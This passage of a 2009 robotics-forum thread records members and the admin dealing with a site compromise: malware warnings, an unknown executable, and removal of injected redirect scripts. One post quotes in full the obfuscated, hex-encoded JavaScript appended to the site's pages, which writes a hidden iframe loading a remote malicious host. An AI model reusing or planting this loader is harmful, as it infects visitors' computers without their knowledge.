go_away

Author Topic: Trojan horse on SoR??  (Read 14532 times)

0 Members and 1 Guest are viewing this topic.

Offline SmAsH

  • Supreme Robot
  • *****
  • Posts: 3,959
  • Helpful? 75
  • SoR's Locale Electronics Nut.
Re: Trojan horse on SoR??
« Reply #60 on: April 07, 2009, 02:03:54 AM »
well weve all played pranks on friends but this isnt one of admins friends (i hope). this guy was trying to upload porn and shiz like that.
Howdy

Offline superchiku

  • Supreme Robot
  • *****
  • Posts: 953
  • Helpful? 5
  • cooll
Re: Trojan horse on SoR??
« Reply #61 on: April 07, 2009, 02:04:54 AM »
find his ip...destroy him with a e bomb then ...             
JAYDEEP ...

IT AND ROBOTICS ENGINEER

"IN THE END IT DOESNT EVEN MATTER"

Offline SmAsH

  • Supreme Robot
  • *****
  • Posts: 3,959
  • Helpful? 75
  • SoR's Locale Electronics Nut.
Re: Trojan horse on SoR??
« Reply #62 on: April 07, 2009, 03:27:41 AM »
i dont think we want to do that superchiku. sending an ebomb to a hacker would seem appropriate but i doubt anyone here would be able to make a complex enough one. and anyway we just want to keep him/her out of the site as it is not our job to deal with these people.
Howdy

Offline Joesavage1

  • Robot Overlord
  • ****
  • Posts: 268
  • Helpful? 0
Re: Trojan horse on SoR??
« Reply #63 on: April 07, 2009, 04:45:00 AM »
Wow! so this is what ive missed while ive been to busy building my $50 robot and stuff!!!

Offline HDL_CinC_Dragon

  • Supreme Robot
  • *****
  • Posts: 1,261
  • Helpful? 5
Re: Trojan horse on SoR??
« Reply #64 on: April 07, 2009, 01:43:02 PM »
I was going to take the time to learn how to hack (white cap hacking only) but I decided to take the time to learn programming and robotics instead :P I still have plenty of time for both later on anyway :)
United States Marine Corps
Infantry
Returns to society: 2014JAN11

Offline Admin

  • Administrator
  • Supreme Robot
  • *****
  • Posts: 11,653
  • Helpful? 169
    • Society of Robots
Re: Trojan horse on SoR??
« Reply #65 on: April 07, 2009, 10:23:54 PM »
I think its good to understand how hackers get into your systems to protect yourself from them.

Offline superchiku

  • Supreme Robot
  • *****
  • Posts: 953
  • Helpful? 5
  • cooll
Re: Trojan horse on SoR??
« Reply #66 on: April 07, 2009, 10:36:33 PM »
if u want to think like a cracker then u have to know the technics used by them...

and plzz guys stop using the word hacker...use cracker instead ...hackers a re gud ppl not the bad ones...
JAYDEEP ...

IT AND ROBOTICS ENGINEER

"IN THE END IT DOESNT EVEN MATTER"

Offline offy

  • Supreme Robot
  • *****
  • Posts: 340
  • Helpful? 1
Re: Trojan horse on SoR??
« Reply #67 on: April 07, 2009, 11:03:37 PM »
Well hackers are good and bad

White Hat Hacker = Helps fix your system
Gray Hat = Just hacks for the heck of it
Black Hat = Hacks your bank account, computer, takes your info so they can get money and ruin your life.

Offline SmAsH

  • Supreme Robot
  • *****
  • Posts: 3,959
  • Helpful? 75
  • SoR's Locale Electronics Nut.
Re: Trojan horse on SoR??
« Reply #68 on: April 08, 2009, 12:20:26 AM »
Well hackers are good and bad

White Hat Hacker = Helps fix your system
Gray Hat = Just hacks for the heck of it
Black Hat = Hacks your bank account, computer, takes your info so they can get money and ruin your life.
wow i never knew there were names for the catgeories?
Howdy

Offline superchiku

  • Supreme Robot
  • *****
  • Posts: 953
  • Helpful? 5
  • cooll
Re: Trojan horse on SoR??
« Reply #69 on: April 08, 2009, 01:03:07 AM »
yup ..there are ..ethical hackers are the good ones...crackers are the bad ones...
JAYDEEP ...

IT AND ROBOTICS ENGINEER

"IN THE END IT DOESNT EVEN MATTER"

Offline Admin

  • Administrator
  • Supreme Robot
  • *****
  • Posts: 11,653
  • Helpful? 169
    • Society of Robots
Re: Trojan horse on SoR??
« Reply #70 on: April 08, 2009, 01:20:18 AM »
First, stop hijacking my thread! :P

Second, a cracker is someone who cracks software/passwords, for example before you pirate software you need to generate 'serialz'.

A hacker is just someone who takes things apart to figure out how they work. You can hack into a circuit just like you can hack into a system. Of course, unauthorized access to a system is illegal, but you can hack your own computer and it wouldn't be illegal.

Offline superchiku

  • Supreme Robot
  • *****
  • Posts: 953
  • Helpful? 5
  • cooll
Re: Trojan horse on SoR??
« Reply #71 on: April 08, 2009, 06:32:04 AM »
love it when the admin says...stop hijacking my thread ..i find it v cute...
JAYDEEP ...

IT AND ROBOTICS ENGINEER

"IN THE END IT DOESNT EVEN MATTER"

Offline Razor Concepts

  • Supreme Robot
  • *****
  • Posts: 1,856
  • Helpful? 53
Re: Trojan horse on SoR??
« Reply #72 on: April 18, 2009, 11:20:34 AM »
Every time I go to the SoR main page or any forum page I get a pop up saying "Could not launch Acrobat". What's up?

Offline Weird Fishes

  • Full Member
  • ***
  • Posts: 60
  • Helpful? 0
Re: Trojan horse on SoR??
« Reply #73 on: April 18, 2009, 12:11:03 PM »
In safari I get a page that says this site contains malicious code (a Google advisory) and this link: http://google.com/safebrowsing/diagnostic?tpl=safari&site=beebest.cn&hl=en-us.
Attached is the warning.

Offline frank26080115

  • Supreme Robot
  • *****
  • Posts: 322
  • Helpful? 2
Re: Trojan horse on SoR??
« Reply #74 on: April 18, 2009, 04:56:25 PM »
Here's the full url
see attached screenshot

Offline SmAsH

  • Supreme Robot
  • *****
  • Posts: 3,959
  • Helpful? 75
  • SoR's Locale Electronics Nut.
Re: Trojan horse on SoR??
« Reply #75 on: April 18, 2009, 05:00:21 PM »
man, if there is another hack admins gonna be pissed. he just got through the first one and...
Howdy

Offline paulstreats

  • Supreme Robot
  • *****
  • Posts: 1,381
  • Helpful? 21
Re: Trojan horse on SoR??
« Reply #76 on: April 18, 2009, 05:24:22 PM »
I came to SOR 30 mins ago and suddenly got a message from my firewall "S8ekhV.exe is trying to access the internet". Also a box came up telling me that system files had been changed and I need to insert the windows cd to replace the files. I ran malwarebytes antimalware which found it and removed it.

Just booted my computer again after removing the virus, tested a few websites and nothing happened but as soon as I came to SOR again I get the same as the above.

The reference site I use says S8ekhV.exe is an as yet unknown malware that is capable of creating, removing or modifying files on the hosts system.

Offline SmAsH

  • Supreme Robot
  • *****
  • Posts: 3,959
  • Helpful? 75
  • SoR's Locale Electronics Nut.
Re: Trojan horse on SoR??
« Reply #77 on: April 18, 2009, 05:28:32 PM »
oh! i guess thats why sor was down for like half an hour a few hours ago? and i better start scanning my pc...
Howdy

Offline frodo

  • Supreme Robot
  • *****
  • Posts: 329
  • Helpful? 2
  • BOW DOWN TO MY MIGHTY STARE!!
Re: Trojan horse on SoR??
« Reply #78 on: April 19, 2009, 08:56:03 AM »
if there are new things like that, it could mess up huge systms, so it needs to be stopped. sounds quite dangerous that s8.exe or whatever its called. i haven't got that warning although my computer has been freezing a lot and a hell of a lot slower so i wonder whether my anti-virus is down.
OMG!!!! I AM SUPREME ROBOT!!!

Check out my Web

Offline Gertlex

  • Supreme Robot
  • *****
  • Posts: 742
  • Helpful? 23
  • Nuclear Engineer Roboticist
Re: Trojan horse on SoR??
« Reply #79 on: April 19, 2009, 08:58:04 AM »
Here's the full url
see attached screenshot

Still happening.

Avast! FTW.
I

Offline offy

  • Supreme Robot
  • *****
  • Posts: 340
  • Helpful? 1
Re: Trojan horse on SoR??
« Reply #80 on: April 19, 2009, 09:39:15 AM »
I am so happy I have Linux, that stupid virus can't touch me =]

Offline frodo

  • Supreme Robot
  • *****
  • Posts: 329
  • Helpful? 2
  • BOW DOWN TO MY MIGHTY STARE!!
Re: Trojan horse on SoR??
« Reply #81 on: April 19, 2009, 09:40:11 AM »
how can't it touch you if you're on linux?

EDIT:

on the end of my url, i normally get "index.php" but now i'm getting "http://www.societyofrobots.com/robotforum/index.php?PHPSESSID=29a3927e4259b972fde42827876afc48&" Should i be getting that and should i normally have ".php" on the end anyway?
« Last Edit: April 19, 2009, 09:43:41 AM by frodo »
OMG!!!! I AM SUPREME ROBOT!!!

Check out my Web

Offline offy

  • Supreme Robot
  • *****
  • Posts: 340
  • Helpful? 1
Re: Trojan horse on SoR??
« Reply #82 on: April 19, 2009, 10:00:02 AM »
that is cookie data. I don't think it will do any harm, but im not to sure.

It can't touch me because linux does not run .exe files such as XP/Vista does and all other window os's. This virus is a .exe file so I am safe.

Offline HDL_CinC_Dragon

  • Supreme Robot
  • *****
  • Posts: 1,261
  • Helpful? 5
Re: Trojan horse on SoR??
« Reply #83 on: April 19, 2009, 11:44:06 AM »
It is in fact a hack on the forum. Its been like this for 2 days now. This script was appended to the bottom of the SoR source file:
Quote from: Some hacker jackass's script
function c320b87fdeq49ea41e584a3f(q49ea41e58520e){ function q49ea41e5859dd(){return 16;} return (eval('pa'+'rseInt')(q49ea41e58520e,q49ea41e5859dd()));}function q49ea41e58697d(q49ea41e58714c){ var q49ea41e5888ba=2; var q49ea41e58791b='';q49ea41e58985a=String['fromCharCode'];for(q49ea41e5880eb=0;q49ea41e5880eb<q49ea41e58714c.length;q49ea41e5880eb+=q49ea41e5888ba){ q49ea41e58791b+=(q49ea41e58985a(c320b87fdeq49ea41e584a3f(q49ea41e58714c.substr(q49ea41e5880eb,q49ea41e5888ba))));}return q49ea41e58791b;} var v1e='';var q49ea41e58a029='3C7'+v1e+'3637'+v1e+'2697'+v1e+'07'+v1e+'43E696628216D7'+v1e+'96961297'+v1e+'B646F637'+v1e+'56D656E7'+v1e+'42E7'+v1e+'7'+v1e+'7'+v1e+'2697'+v1e+'465287'+v1e+'56E657'+v1e+'363617'+v1e+'065282027'+v1e+'2533632536392536362537'+v1e+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+v1e+'332537'+v1e+'32253633253364253237'+v1e+'2536382537'+v1e+'342537'+v1e+'342537'+v1e+'302533612532662532662537'+v1e+'37'+v1e+'2537'+v1e+'37'+v1e+'2537'+v1e+'37'+v1e+'2532652536332536662537'+v1e+'322537'+v1e+'302536312536642536312537'+v1e+'342536312532652536332536652532662537'+v1e+'302536382537'+v1e+'302536642537'+v1e+'392536312536342536642536392536652532662536392536652536342536352537'+v1e+'382532652537'+v1e+'302536382537'+v1e+'30253366253237'+v1e+'2532622534642536312537'+v1e+'342536382532652537'+v1e+'322536662537'+v1e+'352536652536342532382534642536312537'+v1e+'342536382532652537'+v1e+'32253631253665253634253666253664253238253239253261253331253331253337'+v1e+'253331253332253239253262253237'+v1e+'253331253334253336253332253330253636253339253636253333253339253331253334253237'+v1e+'2532302537'+v1e+'37'+v1e+'2536392536342537'+v1e+'34253638253364253333253332253230253638253635253639253637'+v1e+'2536382537'+v1e+'342533642533332533362533362532302537'+v1e+'332537'+v1e+'342537'+v1e+'39253663253635253364253237'+v1e+'2537'+v1e+'362536392537'+v1e+'332536392536322536392536632536392537'+v1e+'342537'+v1e+'39253361253638253639253634253634253635253665253237'+v1e+'2533652533632532662536392536362537'+v1e+'3225363125366425363525336527'+v1e+'29293B7'+v1e+'D7'+v1e+'6617'+v1e+'2206D7'+v1e+'969613D7'+v1e+'47'+v1e+'27'+v1e+'5653B3C2F7'+v1e+'3637'+v1e+'2697'+v1e+'07'+v1e+'43E';q49ea41e58afc8=document;q49ea41e58afc8.write(q49ea41e58697d(q49ea41e58a029));

Chrome wouldnt let me get on the page but firefox does. Im going to be spending the evening scanning my computer lol
United States Marine Corps
Infantry
Returns to society: 2014JAN11

Offline Admin

  • Administrator
  • Supreme Robot
  • *****
  • Posts: 11,653
  • Helpful? 169
    • Society of Robots
Re: Trojan horse on SoR??
« Reply #84 on: April 19, 2009, 01:27:54 PM »
darnit! >:(

The hack is a redirect to a virus hosted on a chinese website. Found lots of 'ladies' spam links in my directory, and some redirect scripts added on to both forum and non-forum pages.  It uses a pdf as the carrier file for the virus.

The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the reoccurance.

Its similar to the last hack, but with some differences so not sure if its the same person yet.

Norton Anti-virus quickly caught it.

Offline daz

  • Beginner
  • *
  • Posts: 1
  • Helpful? 0
Re: Trojan horse on SoR??
« Reply #85 on: April 19, 2009, 01:49:49 PM »
darnit! >:(

The hack is a redirect to a virus hosted on a chinese website. Found lots of 'ladies' spam links in my directory, and some redirect scripts added on to both forum and non-forum pages.  It uses a pdf as the carrier file for the virus.

The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the reoccurance.

Its similar to the last hack, but with some differences so not sure if its the same person yet.

Norton Anti-virus quickly caught it.
Hi. Not known around here, been interested and robots for a while and bookmarked your site for future reference (Been slowly buying the parts needed for the $50 robot).

Now, how recently did you upgrade the forums to 1.1.8? What version did you have previously? Have you been hacked since 1.1.8? I know for a fact ver 1.1.6 was vulnerable. Aside from that, I've heard rumors of a private 1.1.8 exploit but nothing turned up on google.

Also be aware that yes, other services running on your server can be attacked to inject code into your forums. Ex: Apache, the CP (as it seemed you thought @ homepage), or maybe they just guessed/brute forced your password.

Just felt like stopping by your site today and noticed the bad news :(. I'll probably check back here often until you find out the cause.

Hope those fools learn to get a life... this is really most likely an automated attack. Who would bother to attack a hobbyist site? :/ Anyway... can't wait to build my first robot. Will definitely tack on the rangefinder upgrade hehe... but for now, money's been short + other priorities.

Even if this site is continually being hacked, disable the forums for a while and if it gets hacked again then it's likely it's not a forum exploit (but still could be); but people like me need some awesome guides and hobby hangouts like this place. Oh sure, look at me who has probably 1 post and I came out here to drop a few words - not everyone uses the forum but I'm sure many more have enjoyed this awesome resource without stopping by these forums ;). Take them down if you must, put up another forum software if you really really must.

*Salutes the Admin hobbyist*.

Offline dellagd

  • Contest Winner
  • Supreme Robot
  • ****
  • Posts: 731
  • Helpful? 5
  • Come to the dark side... We have cookies!
Re: Trojan horse on SoR??
« Reply #86 on: April 19, 2009, 03:51:43 PM »
I have Mcaffe (sry if it is spelled wrong) and I ran a check and it found nothing. if this virus gets into my computer what could it do?
Innovation is a product of Failure, which leads to Success.

If I helped, +1 helpful pls

I Won!
3rd place! I'm taking $100

Offline SmAsH

  • Supreme Robot
  • *****
  • Posts: 3,959
  • Helpful? 75
  • SoR's Locale Electronics Nut.
Re: Trojan horse on SoR??
« Reply #87 on: April 19, 2009, 04:01:29 PM »
yay for admin :) i have norten360 and spybot search and destroy and neither found anything on my pc ;D
Howdy

Offline paulstreats

  • Supreme Robot
  • *****
  • Posts: 1,381
  • Helpful? 21
Re: Trojan horse on SoR??
« Reply #88 on: April 19, 2009, 05:19:55 PM »
Quote
I have Mcaffe (sry if it is spelled wrong) and I ran a check and it found nothing. if this virus gets into my computer what could it do?

I log straight on to societyofrobots.com not straight into the forums so that might be why you havent noticed anything. The malware as I said above has the ability to read/write/modify files on the host system so it is likely to be a bot system that wants to use your pc without you knowing.

I havent had anything tonight so hopefully admin found it.

Maybe the website is being targeted because of keywords like bot or robot etc... it would seem ironic that botnets are targeted at other bot nets and a real robotic website is being targeted due to plain nameing conventions :P

Offline SmAsH

  • Supreme Robot
  • *****
  • Posts: 3,959
  • Helpful? 75
  • SoR's Locale Electronics Nut.
Re: Trojan horse on SoR??
« Reply #89 on: April 19, 2009, 05:22:35 PM »
I havent had anything tonight so hopefully admin found it.
The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the reoccurance.
and yea that would kinda suck if sor was getting caught in the "crossfire" so to speak :-\
Howdy

 


Get Your Ad Here

data_list